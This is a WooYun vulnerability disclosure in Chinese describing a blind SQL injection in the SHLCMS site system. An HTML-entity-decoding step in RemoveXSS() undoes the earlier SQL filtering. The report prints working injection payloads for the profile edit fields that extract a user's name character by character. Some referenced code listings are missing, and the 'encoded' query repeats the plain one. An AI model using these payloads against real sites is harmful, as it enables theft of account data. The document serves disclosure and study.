漏洞概要 关注数(4) 关注此漏洞
缺陷编号: WooYun-2013-34885
漏洞标题: SHLCMS因逻辑问题造成过滤不严可SQL盲注
相关厂商: 深喉咙企业网站系统
漏洞作者: 吴钩霜雪明
提交时间: 2013-08-21 17:11
公开时间: 2013-11-19 17:11
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: 逻辑错误 安全意识不足 php源码审核 sql注射漏洞利用技巧 php源码分析
漏洞详情
披露状态:
2013-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
SHLCMS因逻辑错误导致SQL注入
详细说明:
SHLCMS在xss过滤函数RemoveXSS()中为了过滤关键字更完全,将HTML编码转换回原来的字符,使得我们可以借HTML编码绕过mysql的关键字过滤。
Shlcms在index.php中对其所有入口参数进行了cleanArrayForMysql处理,如下:
cleanArrayForMysql函数在inc/function.php中,如下
但在留言板或用户资料等可以input的地方做了RemoveXSS处理
RemoveXSS()函数如下
在函数中为了过滤关键字完全,将HTML编码进行了转换。
整理一下流程,我们输入的参数经过 cleanArrayForMysql()->RemoveXSS()->mysql_query();
限制是:RemoveXSS中过滤了逗号。php的mysql_query()不支持多语句执行。
于是:那些被cleanArrayForMysql了的敏感字符可以用HTML编码绕过,然后在RemoveXSS中被转回来
比如在会员中心的编辑资料处的SQL语句,可以这样注入
最后制造出来语句如下:
UPDATE `shl_user` SET `nickname`='a'/*',`email`='aa@aa.aa',`qq`='',`msn`='',`sex`=*/=(select case when (select username from (select * from shl.shl_user) as a where id=1) like 'a%' then 'a' else 'b' end),`address`='' WHERE `id` ='12' LIMIT 1
HTML编码关键字符后如下
UPDATE `shl_user` SET `nickname`='a'/*',`email`='aa@aa.aa',`qq`='',`msn`='',`sex`=*/=(select case when (select username from (select * from shl.shl_user) as a where id=1) like 'a%' then 'a' else 'b' end),`address`='' WHERE `id` ='12' LIMIT 1
漏洞证明:
在会员中心登陆,基本资料-编辑处,编辑内容如下。
nikename:a'/*
sex:*/=(select case when (select username from (select * from shl.shl_user) as a where id=1) like '_____' then 'a' else 'b' end)
结论:id=1的username长度为5
nikename:a'/*
sex:*/=(select case when (select username from (select * from shl.shl_user) as a where id=1) like 'a%' then 'a' else 'b' end)
结论:id=1的username以a开头
用PYTHON写个程序,在select语句中加入正则表达式,可以加快盲注速度。
修复方案:
逻辑严谨一点。
还有代码中发现很多错误。比如那个RemoveXSS()中过滤逗号的那一句应该是开发人员粗心写上去的(他应该只是想把逗号作为分隔符,正则基础不过关啊)(试想留言板不能用逗号那是不实际的)。还有RemoveXSS()那个应该是9ad不是9ab才对。
版权声明:转载请注明来源 吴钩霜雪明@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值